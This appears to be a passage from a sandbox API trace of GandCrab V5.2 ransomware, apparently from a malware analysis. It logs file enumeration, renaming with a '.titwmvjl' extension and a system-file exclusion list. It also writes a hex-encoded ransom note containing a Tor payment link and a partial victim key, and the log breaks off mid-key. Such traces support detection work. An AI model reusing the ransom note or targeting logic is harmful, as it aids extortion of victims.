(lpString="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Links\\d2ca4a09d2ca4deb61a.lock") returned 62 [0092.358] VirtualAlloc (lpAddress=0x0, dwSize=0xbc, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0092.358] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Links\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 71 [0092.358] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Links\\d2ca4a09d2ca4deb61a.lock") returned 62 [0092.358] lstrlenW (lpString=".lock") returned 5 [0092.358] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.358] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0092.358] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.359] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.359] FindNextFileW (in: hFindFile=0x5038f8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0092.359] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0092.359] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0092.359] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Links\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Links\\desktop.ini") returned="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Links\\desktop.ini" [0092.359] lstrlenW (lpString=".titwmvjl") returned 9 [0092.359] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Links\\desktop.ini") returned 49 [0092.359] VirtualAlloc (lpAddress=0x0, dwSize=0xa2, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0092.359] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Links\\desktop.ini.titwmvjl") returned 58 [0092.359] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Links\\desktop.ini") returned 49 [0092.359] lstrlenW (lpString=".ini") returned 4 [0092.359] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.359] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".ini ") returned 5 [0092.359] lstrcmpiW (lpString1=".ini", lpString2=".titwmvjl") returned -1 [0092.359] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.360] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Links\\desktop.ini") returned 49 [0092.360] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Links\\desktop.ini") returned 49 [0092.360] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0092.360] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.360] FindNextFileW (in: hFindFile=0x5038f8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0092.360] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0092.360] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0092.360] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Links\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Links\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Links\\TITWMVJL-DECRYPT.txt" [0092.360] lstrlenW (lpString=".titwmvjl") returned 9 [0092.360] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Links\\TITWMVJL-DECRYPT.txt") returned 58 [0092.360] VirtualAlloc (lpAddress=0x0, dwSize=0xb4, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0092.360] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Links\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 67 [0092.360] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Links\\TITWMVJL-DECRYPT.txt") returned 58 [0092.360] lstrlenW (lpString=".txt") returned 4 [0092.360] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.360] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0092.360] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0092.360] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.361] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Links\\TITWMVJL-DECRYPT.txt") returned 58 [0092.361] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Links\\TITWMVJL-DECRYPT.txt") returned 58 [0092.361] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0092.361] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0092.361] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0092.361] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0092.361] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0092.361] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0092.361] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0092.361] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0092.361] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.361] FindNextFileW (in: hFindFile=0x5038f8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 0 [0092.361] FindClose (in: hFindFile=0x5038f8 | out: hFindFile=0x5038f8) returned 1 [0092.361] CloseHandle (hObject=0x2ac) returned 1 [0092.361] FindNextFileW (in: hFindFile=0x503778, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0092.361] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0092.361] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0092.361] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\TITWMVJL-DECRYPT.txt" [0092.361] lstrlenW (lpString=".titwmvjl") returned 9 [0092.361] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\TITWMVJL-DECRYPT.txt") returned 52 [0092.361] VirtualAlloc (lpAddress=0x0, dwSize=0xa8, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0092.361] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 61 [0092.362] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\TITWMVJL-DECRYPT.txt") returned 52 [0092.362] lstrlenW (lpString=".txt") returned 4 [0092.362] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.362] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0092.362] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0092.362] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.362] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\TITWMVJL-DECRYPT.txt") returned 52 [0092.362] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\TITWMVJL-DECRYPT.txt") returned 52 [0092.362] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0092.362] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0092.362] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0092.362] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0092.362] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0092.362] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0092.362] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0092.362] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0092.362] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.362] FindNextFileW (in: hFindFile=0x503778, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 0 [0092.362] FindClose (in: hFindFile=0x503778 | out: hFindFile=0x503778) returned 1 [0092.363] CloseHandle (hObject=0x230) returned 1 [0092.364] FindNextFileW (in: hFindFile=0x503678, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0092.364] lstrcmpW (lpString1="Links", lpString2=".") returned 1 [0092.364] lstrcmpW (lpString1="Links", lpString2="..") returned 1 [0092.364] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\", lpString2="Links" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Links") returned="C:\\Users\\CIiHmnxMn6Ps\\Links" [0092.364] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Links", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Links\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Links\\" [0092.364] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0092.364] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0092.364] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0092.364] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0092.364] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0092.364] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0092.365] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0092.365] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0092.365] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0092.365] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.365] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0092.365] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Links\\\\TITWMVJL-DECRYPT.txt") returned 49 [0092.365] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Links\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\links\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0092.367] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x